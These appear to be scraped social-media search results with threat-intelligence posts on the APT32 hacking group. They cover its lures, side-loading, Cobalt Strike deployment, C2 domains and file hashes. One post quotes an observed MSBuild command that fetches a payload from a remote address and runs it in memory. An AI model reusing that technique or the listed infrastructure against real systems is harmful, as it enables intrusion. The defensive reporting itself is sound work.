Search results
  1. 30 Jan
    Replying to

    🇻🇳 has to brief metrics like any other government program. Using sales tracking software, their numbers can show what % breached each target is. NOTE: APT32 uses trial accounts for several sales trackers that also allow for legit cloud hosting of their payloads! 📈 ☁️ 💣

  2. 28 Jan

    Moral of the story is - opening an email in certain mail clients can leak information about your system b/c your mail client autoloads a tracking pixel. And although it might be a company hosting a hot party - it could also be someone less "friendly"

  3. 28 Jan

    Let's talk about email tracking pixels for a minute and how sales/marketing (as well as real threat actors) can use them to evaluate the success of an email marketing (or phishing) campaign...or for information gathering before sending a follow-up payload.

  4. 9 Jan
    Replying to

    Further reading on Vietnamese threat actor 🇻🇳 leveraging EPO's software deployment pulls to ship Cobalt Strike enterprise-wide: 🏚️🚪▶️🖥️📀⏩🏘️⏭️🌆😵 I still think asset management abuse needs a fun name. How about "living off the landlord?"

  5. 9 Jan

    Interesting tidbit from report. “The attacker utilized the anti-virus management console service account to distribute the malware across the network.” Sounds similar to deploying Cobalt Strike via McAfee EPO server & I discussed recently on

  6. 20 Dec 2019

    () campaign spreading via FB. Post or DM contains link to a malicious archive hosted on Dropbox. First stage is executed upon opening the decoy “document” seemingly related to Vietnam. Beacons to opengroup.homeunix[.]org via HTTPS.

  7. For the U.S. crowd, just waking up: BMW was hacked by . The carmaker decided to monitor the intruders for months to better understand their goals. No sensitive data is said to be stolen. Also, Hyundai was targeted in the same campaign. (in German)

  8. Exclusive: A hacker group, presumably acting on behalf of the Vietnamese state, has German automotive companies in its sights. They succeeded in penetrating BMW's networks. BMW monitored the hackers for months.

  9. 27 Oct 2019

    Stopped using PowerShell for attacks? Seems to be working just fine for 🇻🇳 lang.ps1 uploaded yesterday (3/56): I appreciate their signature obfuscation style (pictured) The underlying backdoor here is very creative... [1/2]

  10. 23 Oct 2019

    DLL side-loading seems utilized by the group to deliver malware generated by Strike URL:hxxps://cdn.redirectme.net/JbJf File name:Noi dung chi tiet thu moi tham du hoi nghi va lich trinh dien ra hoi nghi tai thu do Paris Phap

  11. 21 Oct 2019

    New test sample seems crafted by the APT group. Malicious payload is dropped to the startup folder through exploit (-2018-20250), meanwhile a resume gets displayed to confuse the victim.

  12. 28 Aug 2019

    targets on Vietnamese human rights organization SHA1: c159e6489ca0b516017b7468013084a8fc422870 File name: "Danh sach cac ca nhan to chuc tai Hai ngoai va quoc noi ung ho cac tu nhan luong tam bi buc hai.exe"

  13. 15 Aug 2019

    Decoy document containing the map of Spratly Islands seems used by the APT group. Similar DLL Side-Loading approach is utilized to carry out related attacks.

  14. 8 Aug 2019

    may be cluster ref. repo of 25/07 md5:05b5707d79ca0aee269eb1b02db75b19

  15. 2 Aug 2019

    The SFX archive drops and executes a lure (docx file) to decoy the victim and the dll file (pkg file) to load the Quasar RAT with the bin file. It has the role of reorganizing the final PE.

  16. 29 Jul 2019

    c7eead9b2a622dd7f14f2ddb9bcd4ea3c4cf3a7dddc30283a057482c4ed6a93e WN: ប្រកាសតែងតាំងមុខតំណែង_docx.exe C2: get[.]freelicenses[.]net

  17. 21 May 2019

    phishing - now with more Windows.csproj & .mp4 downloaded with certutil MSBuild.exe %TEMP%\Windows.csproj /p:AssemblyName=%TEMP%\Windows.mp4 /p:ScriptFile=hxxp://139.59.30[.]109:8090/abcv /p:Key="WindowsService" Payload loaded in memory then deleted from disk

  18. 16 May 2019

    d53779393984053ec239ec16adc272d7 Embedding Base64 string in Content

  19. 10 May 2019
  20. 20 Nov 2018

    / is back with a new watering hole campaign. Many compromised websites including 2 Cambodian ministries (Ministry of Foreign Affairs and Ministry of Defence). Blog: event:
